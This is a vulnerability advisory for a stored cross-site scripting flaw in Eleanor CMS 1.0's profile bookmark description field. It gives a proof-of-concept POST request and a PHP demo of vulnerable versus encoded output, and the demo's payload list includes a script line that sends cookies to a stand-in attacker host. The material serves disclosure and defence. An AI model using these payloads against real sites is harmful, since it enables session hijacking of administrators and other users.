Eleanor 1.0 Stored Cross Site Scripting

2017.01.07
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

==========================
- Discovered By : 0x3a - http://iran-cyber.net - 0x3a.taha[at]gmail.com
- Credit To : Iran Cyber Security Group
- Release Date : 10.8.2016
- Level : High
==========================

I. Vulnerability
----------------
Eleanor CMS <= 1.0 Stored Cross-Site Scripting

II. Background
--------------
Eleanor is a CMS used to build websites.
eleanor-cms.ru
eleanor-cms.ir
A Google search for "intext:Powered+by+Eleanor+CMS" returned about 300,000 results for sites hosted on Eleanor CMS.

III. Description
----------------
Eleanor CMS is vulnerable to stored cross-site scripting. The flaw is in /ELEANOR/modules/account/ajax/index.php and lets an authenticated user inject arbitrary HTML and script into the website. The relevant line in /ELEANOR/modules/account/ajax/index.php is:

[Line 69] $descr=isset($_REQUEST['descr']) ? Strings::CutStr(trim($_REQUEST['descr']),497) : '';

The descr value is taken straight from $_REQUEST. It is only trimmed and cut to 497 characters; there is no HTML encoding or filtering, so whatever markup the user supplies is stored and later rendered as-is. Because the payload is persisted in the profile, it runs in the browser of anyone who views it, which allows cookie hijacking (or any other action in the viewer's session) if an administrator opens the attacker's profile. The only constraint on the payload is the 497-character cut.

IV. Proof of Concept Exploit
----------------------------
1. Register an account on a site hosted by Eleanor CMS.
2. The profile allows you to add an address (bookmark).
3. Put the malicious code in the description field.

POST parameters:
event=add_bookmark&title=0x3a&descr=<marquee><font size=8 color=red face="arial black">0x3a [Iran-Cyber.Net]</font></marquee>&href=iran-cyber.net&imp=1&value=&bmodule=0&module=account

The payload is delivered through the [ descr ] parameter.

Pic Test : goo.gl/CTr71D

V. Systems Affected
-------------------
All versions of Eleanor CMS are affected.

VI. Solution
------------
Encode the value for HTML on output with htmlspecialchars() or htmlentities(), passing ENT_QUOTES and the page's charset, before it is echoed into the page. Note that addslashes() only escapes quotes and backslashes for string contexts; it does not prevent XSS and should not be used as the fix.

----
0x3a
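The vulnerable pattern and its fix, as an added example that is not code from Eleanor CMS or from the advisory author. It models the line quoted above (descr read from $_REQUEST, trimmed, cut to 497 characters, stored verbatim) and the recommended fix of HTML-encoding at the output point; the function names cut_str, store_bookmark, render_bookmark_vulnerable and render_bookmark_hardened are hypothetical stand-ins, and the request bodies are constructed from the advisory's PoC parameters.

```php
<?php
// Added example, not Eleanor CMS code. Models modules/account/ajax/index.php
// line 69 (descr from $_REQUEST, trimmed, cut to 497 chars, stored as-is) and
// the fix: encode on output with htmlspecialchars(). All function names here
// are hypothetical; the request data is constructed for the demo.

declare(strict_types=1);

// Stand-in for Strings::CutStr(): a length limit is not a filter.
function cut_str(string $s, int $max): string
{
    return mb_substr($s, 0, $max, 'UTF-8');
}

// Models the vulnerable handler: the description is stored exactly as sent.
function store_bookmark(array $request): array
{
    $descr = isset($request['descr']) ? cut_str(trim($request['descr']), 497) : '';
    return ['title' => $request['title'] ?? '', 'descr' => $descr];
}

// Vulnerable rendering: stored markup is echoed into the page unchanged.
function render_bookmark_vulnerable(array $bm): string
{
    return '<div class="bookmark">' . $bm['descr'] . '</div>';
}

// Hardened rendering: HTML-encode at the output point, in the page's charset,
// with ENT_QUOTES so both single- and double-quoted attribute contexts are safe.
function html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_bookmark_hardened(array $bm): string
{
    return '<div class="bookmark">' . html($bm['descr']) . '</div>';
}

// Constructed inputs: the advisory's marquee payload, and a script variant
// illustrating the cookie-theft scenario the advisory describes.
$payloads = [
    '<marquee><font size=8 color=red face="arial black">0x3a [Iran-Cyber.Net]</font></marquee>',
    '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>',
];

foreach ($payloads as $p) {
    $bm = store_bookmark([
        'event'   => 'add_bookmark',
        'title'   => '0x3a',
        'descr'   => $p,
        'href'    => 'iran-cyber.net',
        'module'  => 'account',
    ]);
    echo "vulnerable: " . render_bookmark_vulnerable($bm) . "\n";
    echo "hardened:   " . render_bookmark_hardened($bm) . "\n\n";
}
```

The vulnerable renderer emits the tags verbatim, so the marquee renders and the script executes for whoever views the profile; the hardened renderer turns `<`, `>`, `"`, `'` and `&` into entities, so the browser displays the payload as text. Encoding belongs at the output point for the context being written into (HTML body here; attribute, URL and JavaScript contexts need their own encoders), and marking the session cookie HttpOnly limits what a successful injection can steal, but is not a substitute for the encoding.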


Copyright 2017, cxsecurity.com
